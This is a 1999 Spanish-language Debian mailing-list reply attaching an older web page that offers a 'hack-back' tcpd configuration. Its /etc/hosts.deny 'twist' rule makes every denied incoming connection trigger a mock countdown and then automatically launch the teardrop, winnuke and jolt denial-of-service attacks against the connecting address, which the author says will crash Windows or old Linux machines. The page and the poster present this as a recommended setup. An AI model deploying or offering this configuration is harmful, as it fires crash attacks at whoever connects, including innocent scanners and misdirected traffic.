On Thu, 28 Jan 1999, Juanmi Mora wrote: > Date: Thu, 28 Jan 1999 00:59:46 +0100 (CET) > From: Juanmi Mora <juanmi@retemail.es> > To: benalb <benjamin@arrakis.es> > Cc: Javier Viñuales Gutiérrez <vigu@ctv.es>, > Usuarios Debian Español <debian-user-spanish@lists.debian.org> > Subject: Re: ¿Alguien usmeando en mi sistema? > Resent-Date: 28 Jan 1999 00:01:45 -0000 > Resent-From: debian-user-spanish@lists.debian.org > Resent-cc: recipient list not shown: ; > > On Wed, 27 Jan 1999, benalb wrote: > > > Eso de in.telnetd está claro, te han hecho un telnet a tu máquina. No se si > > habrán entrado, supongo que no por lo de peer died. De todos modos no estaría > > de más que cerraras tu máquina con hosts.deny. Yo por ejemplo tengo un script > > que pillé por la red, que le manda al "chico malo" un winnuke, un jolt y un > > teardrop, además de pasarme su ip, dominio, y tal a un fichero. Muy práctico > > porque si el tío insiste, te sirve para escribir al webmaster avisandole del > > nota. > > Si te interesa, ya sabes. > > Hombre... sería un detalle ;-) > > Saludos!!! > > La mando adjunta, aunque no se si se permite esto en la lista. Si hay algun problema y no llega, me la podeis pedir por privado. Saludos. Benjamín Albiñana Pérez mailto:benalb@arrakis.es Linux User Nº78177 Espacio disponible para publicidadTitle: PLASTAS
Script especial para ¡¡¡PLASTAS!!!
Hola a Todos... todos!
El otro d¡a estava yo tan aburrido, que me puse a mirarme las man del tcpd! :-ooooooooooo, y me di¢ por hacer un peque¤o script, que espero le gustar a m s de uno:
Seguro que un monton de gente para conectar a Internet, o ni siquiera carga el inetd, o deniega el acceso a todo los servicios, para evitar a los "curiosos", sobre todo si se frecuenta el irc. Pues he aqu¡ un bonito truco para que cierta gente se lleve una sorpresa, mejor dicho un regalito de navidad... :)
A continuaci¢n pondr‚ dos ficheros, el /etc/hosts.allow y el /etc/hosts.deny. La configuraci¢n es muy b sica, apropiada para aquellos que no necesitan ni telnets, ni ftps, ni gaitas... Si alguien tiene necesidades diferentes, seguro que sabr modificarlos apropiadamente. Debeis tambien aseguraros que /etc/inetd.conf esta configurado para que llame a /usr/bin/tcpd, pero en la mayoria de los casos es as¡.
El regalito consiste en un buen susto, acompa¤ado de un teardrop, un winnuke oob, y un jolt al gracioso. Si por casualidad usase cualquier Windows o un linux inferior a 2.0.32, ya puede ir desconectandose de internet antes de que acabe la cuenta atr s, o que se prepare a resetear su m quina. Si esta bien protegido, el susto que se llevar es suficiente psicologicamente para que no tenga demasiadas ganas de seguir incordiando. Adem s, el script hace sonar un sonido, para que sepais que alguien esta tocando las narices. En mi caso suena el R2D2 cuando se pega un "calambrazo" (woooaaoooo), muy gr fico y divertido, de veras X-)
Adem s, el script crea en /var/log/stupid un log de la gente que ha intentado entrar en la m quina, para saber quien ha sido, va bien sobre todo en caso de que la persona estuviese protegida, as¡ sabes a que atenerte.
Si configurais el inetd adem s para que "acepte" conexiones en puertos altos, sobre el 1000 (mirad /etc/services para saber que servicios existen en puertos altos), pode¡s tambien sorprender a aquellos graciosos que con un probe de tcp se dediquen a escanear para mandaros un icmp "chungo".
Pues solo teneis que reemplazar estos ficheros, cambiar los paths que apuntan a los ejecutables del teardrop, winnuke y jolt, cambiar los que hace el script cuando alguien se conecta (o sea hacer sonar un sonido, o sacar un xmessage, o lo que os apetezca), acto seguido ejecutais "killall -HUP inetd", y ya estareis preparados... ;)
--------------- Cut /etc/hosts.allow --------------------------------- # # hosts.allow This file describes the names of the hosts which are # allowed to use the local INET services, as decided # by the '/usr/sbin/tcpd' server. #
#ALL:LOCAL --------------- Cut /etc/hosts.allow ---------------------------------
--------------- Cut /etc/hosts.deny ---------------------------------- # # hosts.deny This file describes the names of the hosts which are # *not* allowed to use the local INET services, as decided # by the '/usr/sbin/tcpd' server. # # The portmap line is redundant, but it is left to remind you that # the new secure portmap uses hosts.deny and hosts.allow. In particular # you should know that NFS uses portmap! #
# # Don't let Bad People(tm) threaten you. # Invite them to your telnet! ;) # # "El Erizo" (c)1997 by aCk #
ALL: ALL: twist (/usr/bin/play /usr/local/audio/woow1.wav \ > /dev/console 2> /dev/console &) ; \ (/bin/echo Bad Luck, %u@%n, say your prayers ; \ /bin/echo 5 seconds left... ; sleep 1 ; \ /bin/echo 4... ; sleep 1 ; \ /bin/echo 3... ; sleep 1 ; \ /bin/echo 2... ; sleep 1 ; \ /bin/echo 1... ; sleep 1 ; \ /bin/echo BOOOOOOOOOOOM! ; \ /bin/echo New Victim!... >>/var/log/stupid ; \ /bin/echo >>/var/log/stupid ; \ /usr/local/bin/teardrop %a %a \ >>/var/log/stupid 2>>/var/log/stupid ; \ /usr/local/bin/winnuke %a \ >>/var/log/stupid 2>>/var/log/stupid ; \ /usr/local/bin/jolt %a %a \ >>/var/log/stupid 2>>/var/log/stupid ; \ /bin/echo >>/var/log/stupid ; \ /bin/echo And The Looser Is... %a %u@%n %c \ >>/var/log/stupid ; \ /bin/echo >>/var/log/stupid ; \ /bin/echo >>/var/log/stupid ) & --------------- Cut /etc/hosts.deny ----------------------------------
Un saludete, -=>> cHUs GoNzaLeZ <<=- Internes: chusx@arrakis.es
Para hacerme llegar tus comentarios, sugerencias o si deseas colaborar con esta página, por favor, envíame un E-mail a jbmesa@marqueze.net |